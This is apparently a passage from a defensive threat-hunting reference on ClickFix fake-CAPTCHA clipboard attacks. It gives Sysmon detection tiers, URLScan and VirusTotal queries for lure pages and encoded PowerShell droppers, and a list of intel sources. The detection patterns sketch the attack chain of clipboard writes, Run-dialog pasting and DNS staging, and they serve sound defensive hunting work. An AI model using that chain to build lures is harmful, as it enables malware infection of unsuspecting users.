Write-Host "  [Research]  Sysmon EID 1 (powershell w/ -enc) + EID 3 (outbound network)"    -ForegroundColor DarkCyan
Write-Host "  [Hunt]      EID 1 parent=wscript/browser + EID 3 within 60s"                 -ForegroundColor DarkYellow
Write-Host "  [Analyst]   EID 1 (-enc, browser parent) + EID 3 (external) + EID 22 (DNS)"  -ForegroundColor DarkGreen
Write-Host ""
Write-Host "If no alerts fired, verify:" -ForegroundColor DarkGray
Write-Host "  - Sysmon config captures EID 1 (all process creation) and EID 3 (network)"
Write-Host "  - Process creation command-line logging enabled in Sysmon config"
Write-Host "  - DNS logging enabled (EID 22) in Sysmon config"
Write-Host ""

OSINT Sources

URLScan (page.body:navigator.clipboard OR page.body:ClipboardItem) AND (page.title:*verify* OR page.title:*update* OR page.title:*captcha*)

Clipboard API presence anchored to deceptive page titles; retains cross-variant resilience while reducing false positives from clipboard API alone.

URLScan page.body:"I am not a robot" AND page.body:navigator.clipboard

Fake CAPTCHA pages that write to the clipboard — the canonical ClickFix lure UI; high precision across Google reCAPTCHA and Cloudflare impersonation variants.

URLScan page.body:navigator.clipboard AND (page.body:"Win+R" OR page.body:"Windows key" OR page.body:"Run dialog" OR page.body:"Ctrl+V")

Targets pages instructing users to open Run dialog or paste commands — the execution instruction unique to ClickFix and its variants.

VirusTotal Intelligence behavior_processes:"nslookup.exe" tag:powershell

Requires VT Intelligence subscription; targets DNS-based ClickFix staging where nslookup retrieves the payload instead of direct HTTP download.

VirusTotal Intelligence behavior_processes:"powershell.exe" behavior_command_line:"-enc" tag:dropper

Requires VT Intelligence subscription; finds encoded PowerShell droppers consistent with ClickFix payload obfuscation patterns.

Intel Resources

• Proofpoint — ClickFix Social Engineering Technique Floods Threat Landscape — Original Proofpoint research naming and first documenting ClickFix; covers TA571 initial campaigns and early payload taxonomy
• Proofpoint — Around the World in 90 Days: State-Sponsored Actors Try ClickFix — Documents APT28, MuddyWater (TA450), Kimsuky (TA427), and UNK_RemoteRogue adoption of ClickFix between October 2024 and February 2025
• Microsoft Security Blog — Think Before You ClickFix — Comprehensive Microsoft Threat Intelligence analysis covering technique mechanics, nation-state adoption, and the commercialization of ClickFix builders on hacker forums
• Huntress — Don't Sweat the ClickFix Techniques — Primary reference for the ClickFix variant taxonomy (FileFix, TerminalFix, DownloadFix); explains why the chokepoint is stable across all variants
• MITRE ATT&CK — T1204.004 User Execution: Malicious Copy and Paste — Official technique definition added March 18, 2025; procedure examples and detection guidance specific to clipboard-based social engineering
• ClickGrab — Community-sourced payload collection from active ClickFix infrastructure. Plug payloads directly into threat hunting queries to identify indicators in your environment. See intel/clickgrab.md for usage guidance.
• Matt Graeber — Microsoft.Windows.OLE.Clipboard ETW Provider — Discovery and documentation of the OLE Clipboard ETW provider (GUID: 3e0e3a92-b00b-4456-9dee-f40aba77f00e); foundational reference for clipboard write ETW monitoring and ClickFix pre-execution detection
• Mandiant — SilkETW — C# ETW wrapper for security telemetry; enables Microsoft-Windows-Win32k and OLE Clipboard provider monitoring with JSON output and Windows Event Log forwarding; required infrastructure for the ETW clipboard detection layer
• phish.report — IOK Rule Reference — IOK (Indicator of Kit) rule format documentation; Sigma-based syntax for detecting phishing and lure page infrastructure; community rule feed at phish.report/IOK; supports html, js, dom, requests, and headers matchers

Related Chokepoints

Renamed RMM Tools HIGH Ransomware Service Manipulation CRITICAL